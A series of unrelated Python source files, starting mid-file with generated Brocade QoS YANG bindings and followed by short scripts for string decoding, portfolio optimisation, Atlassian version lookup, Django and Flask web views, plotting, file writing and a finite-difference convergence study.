'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_mutation = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_mutation(self):
self.__dscp_mutation = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
def _get_dscp_traffic_class(self):
"""
Getter method for dscp_traffic_class, mapped from YANG variable /routing_system/interface/ve/qos/dscp_traffic_class (map-name-type)
"""
return self.__dscp_traffic_class
def _set_dscp_traffic_class(self, v, load=False):
"""
Setter method for dscp_traffic_class, mapped from YANG variable /routing_system/interface/ve/qos/dscp_traffic_class (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_traffic_class is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_traffic_class() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_traffic_class must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_traffic_class = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_traffic_class(self):
self.__dscp_traffic_class = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
dscp_cos = __builtin__.property(_get_dscp_cos, _set_dscp_cos)
dscp_mutation = __builtin__.property(_get_dscp_mutation, _set_dscp_mutation)
dscp_traffic_class = __builtin__.property(_get_dscp_traffic_class, _set_dscp_traffic_class)
_pyangbind_elements = {'dscp_cos': dscp_cos, 'dscp_mutation': dscp_mutation, 'dscp_traffic_class': dscp_traffic_class, }
|
from collections import deque
class Solution:
def decodeString(self, s):
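        # Stack-based decode: s1 holds pending repeat counts (as strings),
        # s2 holds characters and '[' markers. On a ']', pop characters back
        # to the matching '[' and repeat that segment by the last count in s1.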
s1, s2 = [], []
        q = deque(s)
alpha = [chr(c) for c in range(ord("a"), ord("z") + 1)]
open, close = ["["], ["]"]
prev_digit = False
while q:
node = q.popleft()
if node.isdigit() and prev_digit:
s1[-1] = s1[-1] + node
prev_digit = True
elif node.isdigit():
s1.append(node)
prev_digit = True
elif node in alpha or node in open:
s2.append(node)
prev_digit = False
elif node in close:
tmp = []
while s2:
char = s2.pop()
if char in open:
tmp = tmp[::-1]
break
else:
tmp.append(char)
mul = s1.pop()
s2 += tmp * int(mul)
return "".join(s2)
if __name__ == "__main__":
s = "3[a10[c]]"
obj = Solution()
ans = obj.decodeString(s)
print(ans)
|
import numpy as np
import cvxopt
from cvxopt import solvers
from cvxopt import matrix
from numpy.linalg import eigh
cvxopt.solvers.options['show_progress'] = True
cvxopt.solvers.options['maxiters'] = 1000000
cvxopt.solvers.options['abstol'] = 1e-14
cvxopt.solvers.options['reltol'] = 1e-14
srng = np.random.RandomState
eucn = np.linalg.norm
sqrt = np.sqrt
def linf(x):
return (np.max(np.abs(x)))
N = 500 # number of securities
K = 4 # number of factors
# seed for beta and other factor exposures
seed = np.random.randint(0,100000)
seed = 31877
fmrng = srng(seed)
ones = np.ones(N)
IN = np.diag(ones)
##########################################
#       CONSTRUCT K-FACTOR MODEL         #
#            Y = B X + Z                 #
##########################################
# factor volatilities and variances
fvol = fmrng.exponential(5, K) / 100
fvar = fvol**2
# specific variance
svol = fmrng.uniform(0, 100, N) / 100
svar = svol**2
# construct the factor matrix B
B = np.zeros((N,K))
for k in range(K):
cents = np.array([0, 1/4, 1/2, 3/4, 1])
disps = np.array([1/8, 1/4, 1/2, 3/4, 1])
cent = fmrng.choice(cents)
disp = fmrng.choice(disps)
sgn = fmrng.choice([-1.0, 1.0])
beta = fmrng.normal (sgn * cent, disp, N)
B[:,k] = beta
V = np.diag(fvar)
V_inv = np.diag(1.0 / fvar)
V_sqr = np.diag(sqrt(fvar))
V_inv_sqr = sqrt(V_inv)
Sigma = B @ V @ B.T + np.diag(svar)
# reorient B
# signs = 1.0 * (((B.T / svar) @ ones) < 0)
# B = B * (1 - 2*signs)
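# Closed-form long-short minimum-variance weights under the factor model:
# the N-dimensional problem reduces to a K x K linear system in theta, and the
# unnormalized weights are w = (1 - B theta) / svar, normalized to sum to one.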
def ls_minvar():
M = B.T / svar
A = V_inv + M @ B
b = np.sum(M, 1)
theta = np.linalg.solve(A,b)
w = (1.0 - B @ theta) / svar
r = dict(x = w/sum(w))
r.update(w = w)
r.update(theta = theta)
return (r)
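# phi/psi are the maps used by the fixed-point iteration in ffp() below:
# phi(th) returns the variance-weighted factor exposures of the thresholded
# (long-only) weights, and psi(th) re-solves the K x K system restricted to
# the positions that are currently long.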
def phi(th):
w = np.maximum(0.0, ones - B @ th) / svar
return ( (B * fvar).T @ w )
def psi(th):
domg = 1.0 * (ones > B @ th) / svar
A = V_inv + (domg * B.T) @ B
b = B.T @ domg
theta = np.linalg.solve(A,b)
return (theta)
def ffp(t0):
th_old = t0 - np.inf
th_new = t0
# list of positions that are zero on each iteration
active_list = list()
it = 0
while (linf(th_new-th_old) > 1e-15):
it = it + 1
th_old = th_new
th_new = psi(th_old)
chi = 1.0 * (ones > B @ th_old)
idx = np.where(chi < 0.5)[0]
active_list.append(idx)
r = dict(ffp_it = it)
r.update(theta = th_new)
r.update(psi = psi(th_new))
r.update(phi = phi(th_new))
r.update(active_it = active_list)
return (r)
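# Same fixed-point iteration as ffp(), but expressed in orthogonalized factors
# G = B V^(1/2) O, where O comes from the eigendecomposition of
# V^(1/2) B' Omega B V^(1/2) for the current active set; iterates on omega
# instead of theta.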
def ffp_ortho():
G = np.zeros((N,K))
om_old = -1.0*np.inf
om_new = np.zeros(K)
# list of positions that are zero on each iteration
active_list = list()
it = 0
while (linf(om_new - om_old) > 1e-15):
om_old = om_new
chi = 1.0 * (ones > G @ om_old)
Omg = np.diag(chi / svar)
idx = np.where(chi < 0.5)[0]
active_list.append(idx)
A = V_sqr @ B.T @ Omg @ B @ V_sqr
kappa, O = eigh(A)
O = np.fliplr(O)
G = B @ V_sqr @ O
# ensure positively oriented columns of G
signs = 1.0 * (G.T @ Omg @ ones < 0)
G = G * (1 - 2*signs)
gg = np.diag(G.T @ Omg @ G)
ge = G.T @ Omg @ ones
om_new = ge / (1 + gg)
it = it + 1
r = dict(ffp_it_ortho = it)
r.update(G = G)
r.update(omega = om_new)
r.update(kappa = kappa[::-1])
r.update(active_it_ortho = active_list)
return (r)
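# Long-only minimum variance: run ffp() from theta = 0, threshold the weights
# at zero, cross-check against ffp_ortho(), and compute the Lagrange-multiplier
# quantities lam/eta reported in the checks below.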
def lo_minvar():
ffpit = ffp(np.zeros(K))
theta = ffpit['theta']
w = np.maximum(0.0, ones - B @ theta) / svar
x = w / sum(w)
# run the same thing but by orthogonalizing the factors
ffpit_ortho= ffp_ortho()
chi = 1.0 * (w > 0)
Omg = np.diag(chi / svar)
    # Lagrange multiplier calculations
BTx = B.T @ x
G = ffpit_ortho['G']
GTx = G.T @ x
Oe = Omg @ ones
lam = (1 + BTx @ (B.T @ Oe)) / sum(Oe)
eta = (1 + GTx @ (G.T @ Oe)) / sum(Oe)
r = dict(x = x)
r.update(w = w)
r.update(chi_x = chi)
r.update(theta = theta)
r.update(lam = lam)
r.update(eta = eta)
r.update(G = G)
r.update(GTx = GTx)
r.update(BTx = BTx)
r.update(ffpit)
r.update(ffpit_ortho)
return (r)
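# Numerical benchmarks: solve the same minimum-variance problems with the
# cvxopt QP solver (min w' Sigma w subject to 1'w = 1, plus w >= 0 in the
# long-only case) to validate the closed-form and fixed-point solutions.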
def ls_numeric():
q = matrix (np.zeros(N), tc='d')
h = matrix (0.0, tc='d')
G = matrix(np.zeros(N), tc='d').trans()
A = matrix(np.ones(N), tc='d').trans()
b = matrix([1], tc='d')
sol = solvers.qp (matrix (2*Sigma),q,G,h,A,b)
w = [x for plist in np.asarray (sol['x']) for x in plist]
return np.asarray (w)
def lo_numeric():
q = matrix (np.zeros(N), tc='d')
h = matrix (np.zeros(N), tc='d')
G = matrix(-1.0 * IN, tc='d')
A = matrix(np.ones(N), tc='d').trans()
b = matrix([1], tc='d')
sol = solvers.qp (matrix (2*Sigma),q,G,h,A,b)
w = [x for plist in np.asarray (sol['x']) for x in plist]
return np.asarray (w)
xls = ls_numeric()
xlo = lo_numeric()
ls_var_numeric = xls @ (Sigma @ xls)
lo_var_numeric = xlo @ (Sigma @ xlo)
print("\nCVX Opt benchmarks:")
print(f"\nLS MinVar: {ls_var_numeric}")
print(f"LO MinVar: {lo_var_numeric}\n")
print(f"\nFFP (model seed {seed}).")
ls_mv = ls_minvar()
lo_mv = lo_minvar()
ls_var = ls_mv['x'] @ (Sigma @ ls_mv['x'])
lo_var = lo_mv['x'] @ (Sigma @ lo_mv['x'])
print(f"\nLS MinVar: {ls_var}")
print(f"LO MinVar: {lo_var}\n")
# indicator of long positions
chi = 1.0*(lo_mv['w'] > 0)
print(f"Long positions: {np.int(sum(chi))}\n")
domg = chi / svar
G = lo_mv['G']
omega = lo_mv['omega']
theta = lo_mv['theta']
kappa = lo_mv['kappa']
GG = (domg *G.T) @ G
gg = np.diag(GG)
if (min(omega) < 0):
print("****************************************")
print("* Warning! Negative omega encountered. *")
print("****************************************")
print("Passing correctness checks (above 1e-6 is concerning).\n")
print(f"LS check: {eucn(ls_mv['x']-xls)}")
print(f"LO check: {eucn(lo_mv['x']-xlo)}\n")
print(f"ortho check 1: {eucn(G @ omega - B @ theta)}")
print(f"ortho check 2: {eucn(gg - kappa)}")
print(f"ortho check 3: {eucn(GG-np.diag(gg))}")
print("\nFactor orientation info.")
print(f"\nB.T D_inv e = {np.round((B.T / svar) @ ones,1)}")
print(f"B.T Omega e = {np.round((domg * B.T) @ ones,1)}")
print(f"G.T D_inv e = {np.round((G.T / svar) @ ones,1)}")
print(f"G.T Omega e = {np.round((domg * G.T) @ ones,1)}\n")
print("FFP iterates info.\n")
print(f"FFP iterations: {lo_mv['ffp_it']}")
if (lo_mv['ffp_it'] != lo_mv['ffp_it_ortho']):
print("****************************************")
print("* Warning! FFP and FFP Othro mismatch. *")
print("****************************************")
for i in range(lo_mv['ffp_it']):
active = lo_mv['active_it'][i]
print(f" {len(active)} active positions at iteration {i+1}")
inter = np.intersect1d(active, lo_mv['active_it_ortho'][i])
if (len(inter) != len(active)):
print("***************************************")
print("* Warning! FFP vs FFP_ortho mismatch. *")
print("***************************************")
if (i > 0):
inter = np.intersect1d(active, lo_mv['active_it'][i-1])
if (len(inter) != len(lo_mv['active_it'][i-1])):
print(f"-- active set flipped at iteration {i+1}")
psi_at_fp = lo_mv['psi']
phi_at_fp = lo_mv['phi']
print(f"\n|phi - psi| = {eucn(psi_at_fp - phi_at_fp)}\n")
print("Theta/Omega.\n")
print(f"LS theta: {np.round(ls_mv['theta'],3)}")
print(f"LO theta: {np.round(lo_mv['theta'],3)}")
print(f"LS omega: <to be implemented>")
print(f"LO omega: {np.round(lo_mv['omega'],3)}\n")
print("Lagrange multpliers.\n")
print(f"B.T x: {np.round(lo_mv['BTx'],4)}")
print(f"lam : {np.round(lo_mv['lam'],4)}")
print(f"G.T x: {np.round(lo_mv['GTx'],4)}")
print(f"eta : {np.round(lo_mv['eta'],4)}")
if (lo_var > lo_var_numeric):
print("****************************************")
print("* Warning! Numerical minimum is lower. *")
print("****************************************")
print(f"lo_mv['x']: {lo_mv['x']}")
|
import sys
import urllib.request
import json
import re
known_supported_version = {
'jira-software': '8.13.8',
'confluence': '7.12.2',
'stash': '7.12.1',
}
def get_lts_version(argv):
product = argv[0].lower()
if product == 'jira':
product = 'jira-software'
elif product == 'bitbucket':
product = 'stash'
if product in known_supported_version:
url_archived = f"https://my.atlassian.com/download/feeds/archived/{product}.json"
url_current = f"https://my.atlassian.com/download/feeds/current/{product}.json"
try:
# load archived feeds
archive_feeds = urllib.request.urlopen(url_archived).read()
feeds = loadJSON(archive_feeds)
# load current feeds and append to archive
current_feeds = urllib.request.urlopen(url_current).read()
feeds += loadJSON(current_feeds)
# Filter all LTS versions and sort based on version
lts_versions = [x for x in feeds if x['edition'].lower() == 'enterprise']
sortedVersions = sorted(lts_versions, key=lambda k:cversion(k['version']), reverse=True)
if len(sortedVersions) > 0:
# Pick the latest LTS product version
lts_version = sortedVersions[0]['version']
else:
lts_version = known_supported_version[product]
# Currently latest lts version of Bitbucket and Confluence don't support K8s
# We use non-lts version of those products in the test
if cversion(lts_version) < cversion(known_supported_version[product]):
lts_version = known_supported_version[product]
except:
lts_version = known_supported_version[product]
lts_version = f"{lts_version}-jdk11"
else:
lts_version = 'unknown'
return lts_version
def loadJSON(fdata):
    result = re.search(r"\[.*\]", fdata.decode("utf-8"))
if result is None:
return []
return json.loads(result.group(0))
def cversion(version):
# This method converts the version to a unified string to be used to sort and compare versions correctly
# E.g: '7.12.1' => '00007000120000100000'
# '7.3.19' => '00007000030001900000'
vers = version.split(".")
mapped_ver = ''
for i in range(max(len(vers)-1, 4)):
if len(vers) > i:
# Add zero on left side of version part and make a fixed size of 5 for each part
mapped_ver += vers[i].zfill(5)
else:
# Add '00000' if build/patch/minor part of version are missing
mapped_ver += '00000'
return mapped_ver
if __name__ == "__main__":
if len(sys.argv) > 1:
        print(get_lts_version(sys.argv[1:]))
|
from .glvq import GLVQ
from .deeplvq import DeepLVQ
from .gmlvq import GMLVQ
# from .knn import KNN
# from .lvq1 import LVQ1
from .lvqmln import LVQMLN
from .network import Network
__all__ = [
'GLVQ',
'DeepLVQ',
'GMLVQ',
# 'KNN',
# 'LVQ1',
'LVQMLN',
'Network',
]
|
import os
import random
import numpy as np
# import torch
def seed_everything(seed=42): # noqa D103 # TODO: Remove this ignore
random.seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
np.random.seed(seed)
# torch.manual_seed(seed)
# torch.cuda.manual_seed_all(seed)
# torch.backends.cudnn.deterministic = True
# torch.backends.cudnn.benchmark = False
|
from flask_app import app
from flask import render_template, request, redirect, jsonify, session
from flask import flash
import requests
# class for User
class Author:
def __init__(self, id, contents):
self.id = id
self.contents = contents
# classmethods
# ==========================================================
# retrieve office character name
@classmethod
def getauthor(cls):
rawauthor = requests.get('https://officeapi.dev/api/characters/random')
words2 = rawauthor.json()
print(words2['data'])
endauthor = words2['data']
return endauthor
|
import random
from .serializers import NotionSerializer, NotionActionSerializer, NotionCreateSerializer
from rest_framework.response import Response
from rest_framework.decorators import api_view, permission_classes, authentication_classes
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from django.conf import settings
from django.http import HttpResponse, Http404, JsonResponse
from django.shortcuts import render, redirect
from django.utils.http import is_safe_url
from .models import Notion
from .forms import NotionForm
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
# Create your views here.
def home_view(request, *args, **kwargs):
return render(request, "pages/home.html", context={}, status=200)
@api_view(['POST']) # http method that the client has to send is === POST
@permission_classes([IsAuthenticated])
def notion_create_view(request, *args, **kwargs):
serializer = NotionCreateSerializer(data=request.POST)
if serializer.is_valid(raise_exception=True):
serializer.save(user=request.user)
return Response(serializer.data, status=201)
return Response({}, status=400)
@api_view(['GET']) # http method that the client has to send is === GET
# @authentication_classes([SessionAuthentication])
@permission_classes([IsAuthenticated])
def notion_list_view(request, *args, **kwargs):
qs = Notion.objects.all()
serializer = NotionSerializer(qs, many=True)
return Response(serializer.data)
@api_view(['GET']) # http method that the client has to send is === GET
def notion_detail_view(request, notion_id, *args, **kwargs):
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
# http method that the client has to send is === DELETE or POST
@api_view(['DELETE', 'POST'])
@permission_classes([IsAuthenticated])
def notion_delete_view(request, notion_id, *args, **kwargs):
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
qs = qs.filter(user=request.user)
if not qs.exists():
return Response({"message": "You cannot delete this notion"}, status=401)
obj = qs.first()
obj.delete()
return Response({"message": "Notion deleted successfully"}, status=200)
# http method that the client has to send is === POST
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def notion_action_view(request, *args, **kwargs):
'''
Action options: like, unlike and share
'''
serializer = NotionActionSerializer(data=request.data)
if serializer.is_valid(raise_exception=True):
data = serializer.validated_data
# print(data)
notion_id = data.get("id")
action = data.get("action")
content = data.get("content")
qs = Notion.objects.filter(id=notion_id)
if not qs.exists():
return Response({}, status=404)
obj = qs.first()
if action == "like":
obj.likes.add(request.user)
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
elif action == "unlike":
obj.likes.remove(request.user)
serializer = NotionSerializer(obj)
return Response(serializer.data, status=200)
elif action == "share":
new_notion = Notion.objects.create(
user=request.user, parent=obj, content=content)
serializer = NotionSerializer(new_notion)
return Response(serializer.data, status=201)
return Response({}, status=200)
def notion_create_view_pure_django(request, *args, **kwargs):
user = request.user
if not request.user.is_authenticated:
user = None
if request.is_ajax():
return JsonResponse({}, status=401)
return redirect(settings.LOGIN_URL)
form = NotionForm(request.POST or None)
next_url = request.POST.get("next") or None
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
if request.is_ajax():
            # 201 == created items
return JsonResponse(obj.serialize(), status=201)
        if next_url is not None and is_safe_url(next_url, ALLOWED_HOSTS):
return redirect(next_url)
form = NotionForm()
if form.errors:
if request.is_ajax():
return JsonResponse(form.errors, status=400)
return render(request, 'components/form.html', context={"form": form})
def notion_list_view_pure_django(request, *args, **kwargs):
qs = Notion.objects.all()
notion_list = [x.serialize() for x in qs]
data = {
"isUser": False,
"response": notion_list,
}
return JsonResponse(data)
def notion_detail_view_pure_django(request, notion_id, *args, **kwargs):
data = {
"id": notion_id,
}
status = 200
try:
obj = Notion.objects.get(id=notion_id)
data['content'] = obj.content
except:
data['message'] = "Not Found"
status = 404
return JsonResponse(data, status=status)
# return HttpResponse(f"<h1>Hello, World! The notion id is {notion_id} - {obj.content}</h>")
|
# %%
import numpy as np
import pandas as pd
import git
# Find home directory for repo
repo = git.Repo("./", search_parent_directories=True)
homedir = repo.working_dir
# Import plotting features
import matplotlib.pyplot as plt
import seaborn as sns
# %%
# Set plot style
sns.set_style("ticks")
sns.set_palette("colorblind", color_codes=True)
sns.set_context("paper")
# load data
df_enzymes = pd.read_csv(f'{homedir}/data/processed/genetics/stab8_cursonetal_2018_tidy.csv')
df_enzymes.head()
# Plot boxplot with seaborn
#Define colors
colors = ['#E69F00','#56B4E9','#009E73','#F0E442','#0072B2','#D55E00','#CC79A7','#000000']
# Set custom color palette
sns.set_palette(sns.color_palette(colors))
#Make figure
fig = plt.figure(figsize=(2.95, 1.95), dpi=192)
#Make boxplot
ax=sns.boxplot(y='Reads_per_Kb_per_million_mapped_reads', x='Enzyme',
data=df_enzymes,
width=0.6,
linewidth=1)
#Rotate x tick marks
plt.xticks(rotation=30)
# add swarmplot
# bplot=sns.swarmplot(y='Reads_per_Kb_per_million_mapped_reads', x='Enzyme',
# data=df_enzymes,
# color='black',
# alpha=0.2)
#Set axes labels and limits
ax.set(xlabel='Gene', ylabel='Reads per Kb per \n million mapped reads')
ax.set_ylim(-5,125)
#Save figure
fig.savefig(f'{homedir}/figures/genetics/metatranscriptomics/stab8_curson2018_bact_boxp_rpkm.pdf', bbox_inches='tight')
# %%
|
import os, threading
class QtcFile(object):
def __init__(self, path, validator):
self._writer = FileWriter(path)
self._validator = validator
self._path = path
def write(self, path):
if self._validator.is_valid(path):
self._writer.write(path)
def remove(self, path):
if self._validator.is_valid(path):
self._writer.remove(path)
def update(self):
self._writer.process_caches()
class FileWriter(object):
def __init__(self, path):
if not os.path.isfile(path):
raise InvalidPathError('The file {} does not exist.'.format(str(path)))
self._path = path
self._write_cache = set()
self._remove_cache = set()
with open(self._path, 'w') as f:
f.truncate()
self._lock = threading.Lock()
def write(self, path):
self._lock.acquire()
self._write_cache.add(path)
self._lock.release()
def remove(self, path):
self._lock.acquire()
self._remove_cache.add(str(path))
self._lock.release()
def process_caches(self):
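        # Swap both caches out under the lock, then rewrite the file: existing
        # lines not scheduled for removal are kept, newly written paths are
        # appended, and paths present in both caches cancel out.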
self._lock.acquire()
write_cache = self._write_cache.difference(self._remove_cache)
remove_cache = self._remove_cache.difference(self._write_cache)
self._write_cache = set()
self._remove_cache = set()
self._lock.release()
if len(write_cache) > 0 or len(remove_cache) > 0:
with open(self._path, 'r+') as f:
data = f.readlines()
f.seek(0)
for path in data:
stripped_path = path.strip('\n')
if stripped_path not in remove_cache:
f.write(path)
for path in write_cache:
f.write(path + '\n')
f.truncate()
class InvalidPathError(Exception):
    def __init__(self, msg):
        super(InvalidPathError, self).__init__(msg)
        self.msg = msg
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
# making life easier
def l2hnorm(x, h):
return np.linalg.norm(x)*np.sqrt(h)
# Collectors for convergence analysis
err = []
hs = []
#Choose here if you want to see the plots for h = 0.2
plot = False
#Choose here if you want to use the asymmetrical domain
asym = True
# Creating a matrix for the symmetrical case
def make_A(n):
L = np.diag((n-1)*[2],0)
L += np.diag((n-2)*[-1],1)
L += np.diag((n-2)*[-1],-1)
return L
# Creating a similar matrix for the asymmetrical case
def make_A_asym(n):
L = np.diag((n-1)*[2.0],0)
L += np.diag((n-2)*[-1.0],1)
L += np.diag((n-2)*[-1.0],-1)
L[0,0] = 1
L[0,1] = -(2/3)
return L
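# Refinement loop: four successively halved grids starting at h = 0.2. On each
# grid, assemble the 1D finite-difference Laplacian and solve -u'' = f on (0, 1)
# with u(0) = 1, u(1) = 2 for both right-hand sides; the discrete L2 error of u2
# is recorded for the convergence fit below.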
for k in range(0,4):
# k refinement
h = 0.2/(2**k)
hs.append(h)
n = int(1/h)
    # creating the domain and a finer domain for the exact solution
omega = np.linspace(0,1, n+1)
omega2 = np.linspace(0,1, 100)
if asym:
omega = np.delete(omega, 1)
# Calling the proper matrix creation
A = make_A(n) if not asym else make_A_asym(n-1)
L = A/(h**2)
# exact solutions
fn1 = lambda x: -1/2*np.power(x,2)+3/2*x+1
fn2 = lambda x: -1*np.exp(x)+np.e*x+2
# inner points of the computational domain
wh = np.linspace(0+h, 1-h, n-1)
if asym:
wh = wh[1:]
# creating the boundary conditions
f1 = np.ones(wh.shape[0])
f1[0] += 1/h/h if not asym else 1/3/h/h
f1[-1] += 2/h/h
f2 = np.exp(wh)
f2[0] += 1/h/h if not asym else 1/3/h/h
f2[-1] += 2/h/h
# Solving the system
u1 = np.linalg.solve(L.copy(),f1)
u2 = np.linalg.solve(L.copy(),f2)
# inserting boundary conditions
u1 = np.insert(u1, 0, 1)
u1 = np.append(u1, 2)
u2 = np.insert(u2, 0, 1)
u2 = np.append(u2, 2)
# Plotting of the solution
if k==0 and plot:
print(L)
print(f1)
print(f2)
plt.plot(omega, u1, '-x', label="numerical")
plt.plot(omega2, fn1(omega2), label="analytical")
plt.legend()
plt.show()
plt.plot(omega, u2, '-x', label="numerical")
plt.plot(omega2, fn2(omega2), label="analytical")
plt.legend()
plt.show()
print(u1)
print(fn1(omega))
print(u2)
print(fn2(omega))
#Convergence analysis of u2
print(l2hnorm(u1-fn1(omega), h))
err.append(l2hnorm(u2-fn2(omega),h))
print(err[-1])
# Finding alpha and C
to_fit = lambda x,a,c: c*np.power(x,a)
fitted = curve_fit(to_fit, hs, err)[0]
print(fitted)
# Plotting Convergence analysis
plt.loglog(hs,err,'-x', label="Global Error")
plt.loglog(hs, to_fit(hs, *fitted), label="Fitted power law")
plt.legend()
plt.axis('equal')
plt.show()
|